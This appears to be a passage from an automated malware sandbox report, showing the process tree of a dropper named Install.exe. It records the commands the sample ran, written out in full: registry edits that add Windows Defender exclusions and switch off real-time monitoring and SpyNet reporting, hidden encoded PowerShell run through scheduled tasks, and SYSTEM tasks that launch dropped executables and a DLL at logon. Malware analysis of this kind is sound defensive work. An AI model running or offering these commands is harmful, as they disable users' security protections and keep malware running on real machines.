wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 268 1628 Install.exe 31 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 1628 wrote to memory of 1888 1628 Install.exe 33 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 268 wrote to memory of 1164 268 forfiles.exe 35 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1888 wrote to memory of 1892 1888 forfiles.exe 36 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1164 wrote to memory of 912 1164 cmd.exe 37 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1892 wrote to memory of 968 1892 cmd.exe 38 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1164 wrote to memory of 1244 1164 cmd.exe 40 PID 1892 wrote to memory of 1016 1892 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AppData\Local\Temp\7zSF068.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\7zSF3C2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:912
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1244
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1016
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gJaSgeuiG" /SC once /ST 14:11:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gJaSgeuiG"4⤵PID:548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gJaSgeuiG"4⤵PID:916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvlIjxbhjqoskMIGsW" /SC once /ST 18:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exe\" Fi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:960
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {002F7B29-A817-43CB-8462-F491F620BFFD} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1080 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:556
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1184
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:988
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1736
-
C:\Windows\system32\taskeng.exetaskeng.exe {D4733AF6-488D-41CA-AF51-432069F5FB9C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1016
-
C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exeC:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\vzXMZqI.exe Fi /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:812 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWRYnfMTm" /SC once /ST 11:25:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWRYnfMTm"3⤵PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWRYnfMTm"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1964
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:976
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giccBIyDU" /SC once /ST 16:35:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giccBIyDU"3⤵PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giccBIyDU"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:323⤵PID:1984
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:643⤵PID:1092
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:323⤵PID:976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:643⤵PID:1264
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:644⤵PID:1576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\TKLYYQlZQscfmQGO\EithrlnS\KWNnrTVprbxBZNrS.wsf"3⤵PID:1792
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\TKLYYQlZQscfmQGO\EithrlnS\KWNnrTVprbxBZNrS.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1520 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:324⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:324⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:324⤵PID:872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LNUBGVQNDOUn" /t REG_DWORD /d 0 /reg:644⤵PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:324⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR" /t REG_DWORD /d 0 /reg:644⤵PID:580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:324⤵PID:988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mbQXQWfiU" /t REG_DWORD /d 0 /reg:644⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:324⤵PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pqzHHOUJlDLoC" /t REG_DWORD /d 0 /reg:644⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:324⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yaZvCAUzKqxU2" /t REG_DWORD /d 0 /reg:644⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NRVKUIgAFoPoXkVB" /t REG_DWORD /d 0 /reg:644⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:324⤵PID:688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx" /t REG_DWORD /d 0 /reg:644⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TKLYYQlZQscfmQGO" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYlRDXrIt" /SC once /ST 17:56:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYlRDXrIt"3⤵PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYlRDXrIt"3⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:968
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:912
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1984
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JApWNoHZsVVCavdbE" /SC once /ST 04:47:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exe\" PA /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "JApWNoHZsVVCavdbE"3⤵PID:1444
-
-
-
C:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exeC:\Windows\Temp\TKLYYQlZQscfmQGO\PLYnerbTsGuwjph\xqcOwVf.exe PA /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1552 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvlIjxbhjqoskMIGsW"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1888
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1532
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:592
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\mbQXQWfiU\evxFWP.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VifYLfsFUZBOnFr" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VifYLfsFUZBOnFr2" /F /xml "C:\Program Files (x86)\mbQXQWfiU\ONCvIzB.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1612
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "VifYLfsFUZBOnFr"3⤵PID:1344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VifYLfsFUZBOnFr"3⤵PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aHccXdIPUxGykP" /F /xml "C:\Program Files (x86)\yaZvCAUzKqxU2\FUQPhRZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xJAfwssuCzqxd2" /F /xml "C:\ProgramData\NRVKUIgAFoPoXkVB\UndaXrE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:916
-
-
